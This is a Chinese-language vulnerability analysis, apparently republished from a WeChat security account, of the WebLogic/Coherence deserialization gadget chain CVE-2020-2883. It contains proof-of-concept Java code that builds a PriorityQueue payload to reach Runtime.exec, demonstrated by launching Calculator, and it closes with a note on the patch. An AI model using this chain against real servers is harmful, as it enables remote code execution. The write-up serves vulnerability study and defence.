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No.1
简述
学习思路Weblogic 4月份CPU补丁更新一个新的Gadget,这个 Gadget 还是出自 coherence,下面来看看吧。
No.2
漏洞分析
这里先给出Gadget
readObject:797, PriorityQueue (java.util)
heapify:737, PriorityQueue (java.util)
siftDown:688, PriorityQueue (java.util)
siftDownUsingComparator:722, PriorityQueue (java.util)
compare:71, ExtractorComparator (com.tangosol.util.comparator)
extract:81, ChainedExtractor (com.tangosol.util.extractor)
extract:109, ReflectionExtractor (com.tangosol.util.extractor)
invoke:498, Method (java.lang.reflect)
看完这个链大家是不是有点眼熟,我们再来看看 CC2 的链,所以这两个是不是有点像呢。
PriorityQueue.readObject
-> PriorityQueue.heapify()
-> PriorityQueue.siftDown()
-> PriorityQueue.siftDownUsingComparator()
-> TransformingComparator.compare()
-> InvokerTransformer.transform()
-> TemplatesImpl.newTransformer()
... templates Gadgets ...
-> Runtime.getRuntime().exec()
其实有点基础的人到这里应该就知道怎么构造 Gadget 了,当然这里还是做一下 Gadget 分析,不然这篇文章就没有任何意义了。
PriorityQueue#readObject 调用 heapify 方法。
private void readObject(java.io.ObjectInputStream s)
throws java.io.IOException, ClassNotFoundException {
// Read in size, and any hidden stuff
s.defaultReadObject();
// Read in (and discard) array length
s.readInt();
queue = new Object[size];
// Read in all elements.
for (int i = 0; i < size; i++)
queue[i] = s.readObject();
// Elements are guaranteed to be in "proper order", but the
// spec has never explained what that might be.
heapify();
}
跟进 heapify 方法,调用 siftDown
private void heapify() {
for (int i = (size >>> 1) - 1; i >= 0; i--)
siftDown(i, (E) queue[i]);
}
在 siftDown 方法中,如果 comparator 不为null的情况下,会调用 siftDownUsingComparator 。
private void siftDown(int k, E x) {
if (comparator != null)
siftDownUsingComparator(k, x);
else
siftDownComparable(k, x);
}
在 siftDownUsingComparator 当中有个核心方法 comparator.compare 。
private void siftDownUsingComparator(int k, E x) {
int half = size >>> 1;
while (k < half) {
int child = (k << 1) + 1;
Object c = queue[child];
int right = child + 1;
if (right < size &&
comparator.compare((E) c, (E) queue[right]) > 0)
c = queue[child = right];
if (comparator.compare(x, (E) c) <= 0)
break;
queue[k] = c;
k = child;
}
queue[k] = x;
}
回忆一下 CC2 的操作,CC2 当中是通过 TransformingComparator.compare 来达到效果的,而我们知道 Comparator 是一个 interface 。
也就是说回到 coherence.jar 这个jar当中,我们只要找到一个实现 Comparator 的类,这个类里面有个 compare 方法,且内容可控的情况下就好了,所以这就来到这次漏洞的主角 ExtractorComparator 当中。
extract , this.m_extractor 这两个字眼相信自己动手调试过 2020-2555 的同学都不太陌生。
public int compare(T o1, T o2) {
Comparable a1 = o1 instanceof Entry ? (Comparable)((Entry)o1).extract(this.m_extractor) : (Comparable)this.m_extractor.extract(o1);
Comparable a2 = o2 instanceof Entry ? (Comparable)((Entry)o2).extract(this.m_extractor) : (Comparable)this.m_extractor.extract(o2);
if (a1 == null) {
return a2 == null ? 0 : -1;
} else {
return a2 == null ? 1 : a1.compareTo(a2);
}
}
No.3
POC调试
前面都说过这个链和CC2有点像,我们先看CC2咋写的。
Object templates = Gadgets.createTemplatesImpl(command);
InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
PriorityQueue<Object> queue = new PriorityQueue(2, new TransformingComparator(transformer));
queue.add(1);
queue.add(1);
Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");
Object[] queueArray = (Object[])((Object[])Reflections.getFieldValue(queue, "queue"));
queueArray[0] = templates;
queueArray[1] = 1;
先看最前面这部分的构造,构建一个 InvokerTransformer 方法来填充,使用 TransformingComparator 进行处理,封装到 PriorityQueue 对象当中。
InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
PriorityQueue<Object> queue = new PriorityQueue(2, new TransformingComparator(transformer));
queue.add(1);
queue.add(1);
参考这个写法,调试过这个 2020-2555 的同学应该不陌生ReflectionExtractor 和 ChainedExtractor ,这两个方法组合可以达到反射命令执行的效果,所以下面利用这两个方法参照上面CC2组装 PriorityQueue 的方法进行操作。
ReflectionExtractor reflectionExtractor = new ReflectionExtractor("toString", new Object[] {});
ValueExtractor[] valueExtractors1 = new ValueExtractor[] {
reflectionExtractor
};
ChainedExtractor chainedExtractor1 = new ChainedExtractor(valueExtractors1);
PriorityQueue queue = new PriorityQueue(2, new ExtractorComparator(chainedExtractor1));
queue.add("1");
queue.add("1");
第二部分CC2通过反射替换了原来 PriorityQueue 当中的 payload 对象。
Object[] queueArray = (Object[])((Object[])Reflections.getFieldValue(queue, "queue"));
queueArray[0] = templates;
queueArray[1] = 1;
所以参考这部分,还记得之前的 this.m_extractor 嘛,所以下面的操作是这样的。
ReflectionExtractor reflectionExtractor1 = new ReflectionExtractor("getMethod", new Object[] {"getRuntime", new Class[]{}});
ReflectionExtractor reflectionExtractor2 = new ReflectionExtractor("invoke", new Object[]{null, new Object[]{}}); //ReflectionExtractor reflectionExtractor3 = new ReflectionExtractor("exec", new Object[]{new String[]{"calc"}});
ReflectionExtractor reflectionExtractor3 = new ReflectionExtractor("exec", new Object[]{new String[]{"open","/System/Applications/Calculator.app"}});
ValueExtractor[] valueExtractors = new ValueExtractor[] {
reflectionExtractor1,
reflectionExtractor2,
reflectionExtractor3,
};
Class clazz = ChainedExtractor.class.getSuperclass();
Field m_aExtractor = clazz.getDeclaredField("m_aExtractor");
m_aExtractor.setAccessible(true);
m_aExtractor.set(chainedExtractor1, valueExtractors); final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
queueArray[0] = Runtime.class;
queueArray[1] = "1";
实际上到这里整个链的组装就完成了,后面命令反射部分实际上是 2555 的知识,只是入口不一样的而已。
No.4
漏洞修复
weblogic在黑名单当中,增加 reflectionExtractor 和 Runtime 过滤,并且 coherence 在自身 reflectionExtractor 类中增加了class等判断,反射应该是过不了了。
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END
原文始发于微信公众号(白帽子):Weblogic&coherence Gadget分析(CVE-2020-2883)
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